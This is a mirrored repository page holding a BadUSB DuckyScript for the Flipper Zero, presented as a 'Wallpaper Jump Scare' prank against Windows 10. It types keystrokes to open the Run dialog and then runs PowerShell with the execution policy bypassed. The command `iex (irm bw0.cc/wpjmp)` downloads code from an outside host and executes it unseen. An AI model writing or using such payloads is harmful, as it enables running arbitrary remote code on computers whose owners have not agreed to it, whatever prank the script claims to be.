mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-05 20:40:14 -08:00
14 lines
304 B
Plaintext
14 lines
304 B
Plaintext
REM Title: beigeworm's Wallpaper Jump Scare.
|
|
REM Author: @beigeworm
|
|
REM Description: This script changes downlaods a scary image and sets it as a wallpaper.
|
|
REM Target: Windows 10
|
|
|
|
REM open powershell
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Ep Bypass -C iex (irm bw0.cc/wpjmp)
|
|
ENTER
|
|
|
|
|